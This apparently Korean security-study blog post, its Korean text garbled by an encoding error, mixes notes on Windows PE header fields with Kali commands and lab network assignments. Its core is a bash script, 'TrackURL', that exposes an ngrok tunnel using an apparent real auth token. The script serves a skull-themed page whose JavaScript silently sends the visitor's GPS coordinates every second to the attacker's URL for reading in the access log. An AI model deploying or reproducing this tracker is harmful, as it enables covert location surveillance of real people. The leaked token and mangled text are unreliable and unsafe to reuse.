2022-06-21
- -
*μλμ° PE
1. Windows Preinstallation Environment
2. Windows Portable Executable
1. Dos Header -> μκ·Έλμ³ μ½λκ° MZλ€
2. Dos Stub -> μλ―Έμλ μ½λλ‘ λ§μλλ‘ λ³κ²½ν΄λ μ€νμ λ¬Έμ κ° μλ€.
3. NT Header
3-1) Signature -> μκ·Έλμ³ μ½λκ° PEλ€
3-2) File Header
WORD Machine; -> νμ¬ μ»΄ν¨ν°μ μ’
λ₯ 014C
WORD NumberOfSections; -> μΉμ
μ κ°μ 0003
DWORD TimeDateStamp; -> μμ±μκ° 48025287
DWORD PointerToSymbolTable;
DWORD NumberOfSymbols;
WORD SizeOfOptionalHeader; -> Optional Headerμ ν¬κΈ° 00E0
WORD Characteristics; -> ν΄λΉ νμΌμ κΈ°λ₯ 010F
3-3) Optional Header
WORD Magic; -> μ€ννμΌμ μ’
λ₯ 010B
BYTE MajorLinkerVersion;
BYTE MinorLinkerVersion;
DWORD SizeOfCode;
DWORD SizeOfInitializedData;
DWORD SizeOfUninitializedData;
DWORD AddressOfEntryPoint; ->νμΌμ΄ μ€νλλ©΄μ λ©λͺ¨λ¦¬μ μ¬λΌκ°λ μμμ μ΄ λλ μ£Όμ 0000739D
DWORD BaseOfCode; -> μ½λμμμ μμμ
DWORD BaseOfData; -> λ°μ΄νμμμ μμμ
DWORD ImageBase; -> 01000000
DWORD SectionAlignment; -> λ©λͺ¨λ¦¬ ννμΌ λ λ°°μμ κΈ°μ€
DWORD FileAlignment; -> νμΌ ννμΌ λ λ°°μμ κΈ°μ€
WORD MajorOperatingSystemVersion;
WORD MinorOperatingSystemVersion;
WORD MajorImageVersion;
WORD MinorImageVersion;
WORD MajorSubsystemVersion;
WORD MinorSubsystemVersion;
DWORD Win32VersionValue;
DWORD SizeOfImage; -> λ©λͺ¨λ¦¬ ννμΌ λ ν¬κΈ°
DWORD SizeOfHeaders; -> ν€λμ ν¬κΈ°
DWORD CheckSum;
WORD Subsystem; -> μ€ννμ λ νλ©΄ ꡬμ±(CUI, GUI λ±)
WORD DllCharacteristics;
DWORD SizeOfStackReserve;
DWORD SizeOfStackCommit;
DWORD SizeOfHeapReserve;
DWORD SizeOfHeapCommit;
DWORD LoaderFlags;
DWORD NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory
4. text(code) Header
5. data Header
6. rsrc Header
7. text(code) Section
8. data Section
9. rsrc Section
----------------------
sudo passwd root
kali
toor
toor
TrackURL
apt-get update
apt-get install gedit
service apache2 start == systemctl start httpd
gnome-terminal -e './ngrok http 80'
apt-get install gnome-terminal
apt-get install xterm
'./ngrok config add-authtoken 2AsCJD6nlqu4BI8CEoIZKAZaVJJ_884HESRjtSZscmWHS9EFG'
#!/bin/bash
#64_bit
#xterm -e ./ngrok http 80 & clear
#32_Bit
gnome-terminal -e './ngrok http 80'
'./ngrok config add-authtoken 2AsCJD6nlqu4BI8CEoIZKAZaVJJ_884HESRjtSZscmWHS9EFG'
echo " ______________________________________________________
7 77 _ 77 _ 77 77 7 77 7 77 _ 77 7
!__ __!| _|| _ || ___!| __!| | || _|| |
7 7 | _ \ | 7 || 7___| || | || _ \ | !___
| | | 7 || | || 7| 7 || ! || 7 || 7
!__! !__!__!!__!__!!_____!!__!__!!_____!!__!__!!_____!
"
sleep 5
read -p ' URL: ' varurl
echo "<!DOCTYPE html>
<html>
<head>
<title> γ΄γ
γ
γΉγ΄γ
γ
γΉ </title>
<style type=\"text/css\">
body {
background-image: url(\"skull.jpg\");
background-size: 1000px 1600px;
background-repeat: no-repeat;
}
</style>
</head>
<body>
<script src=\"https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js\" type='text/javascript' ></script>
<script type='text/javascript'>
function httpGet(theUrl)
{
var xmlHttp = new XMLHttpRequest();
xmlHttp.open( \"GET\", theUrl, false ); // false for synchronous request
xmlHttp.send( null );
return xmlHttp.responseText;
}
function autoUpdate() {
navigator.geolocation.getCurrentPosition(function(position) {
coords = position.coords.latitude + \",\" + position.coords.longitude;
url = \""$varurl"/logme/\" + coords;
httpGet(url);
console.log('should be working');
setTimeout(autoUpdate, 1000);
})
};
\$(document).ready(function(){
autoUpdate();
});
</script>
</body>
</html>" > index.html
mv index.html /var/www/html/index.html
cp skull.jpg /var/www/html/skull.jpg
service apache2 start
echo " ______________________________________________________
7 77 _ 77 _ 77 77 7 77 7 77 _ 77 7
!__ __!| _|| _ || ___!| __!| | || _|| |
7 7 | _ \ | 7 || 7___| || | || _ \ | !___
| | | 7 || | || 7| 7 || ! || 7 || 7
!__! !__!__!!__!__!!_____!!__!__!!_____!!__!__!!_____!
" > /var/log/apache2/access.log
xterm -e tail -f /var/log/apache2/access.log &
clear
exit
/usr/binμμ
google-chrome-stable νμΌ
--user-data-dir --test-type --no-sandbox
----μ
λ ₯κΈ° μ€μΉ----
apt-get install fcitx-lib*
apt-get install fcitx-hangul
------------------------------------------------
κ°μꡬ[192.168.0.20] : 192.168.100.11(κΉμ ν)
192.168.250.11(μ€μ±μ)
20001 / 20002
------------------------------------------------
κΉμ ν[192.168.0.30] : 192.168.150.10(λ°μ ν)
192.168.100.10(κ°μꡬ)
30001 / 30002
------------------------------------------------
μ€μ±μ[192.168.0.40] : 192.168.200.10(λ°μ ν)
192.168.250.10(κ°μꡬ)
40001 / 40002
------------------------------------------------
λ°μ ν[192.168.0.200] : 192.168.150.11(κΉμ ν)
192.168.200.11(μ€μ±μ)
50001/ 50002
------------------------------------------------
'π Secure' μΉ΄ν κ³ λ¦¬μ λ€λ₯Έ κΈ
2022-06-23 (0) | 2022.06.28 |
---|---|
2022-06-22 (0) | 2022.06.28 |
2022-06-20 (0) | 2022.06.28 |
2022-06-16 (0) | 2022.06.28 |
DLL Ejection (0) | 2022.06.28 |
λΉμ μ΄ μ’μν λ§ν μ½ν μΈ
μμ€ν κ³΅κ° κ°μ¬ν©λλ€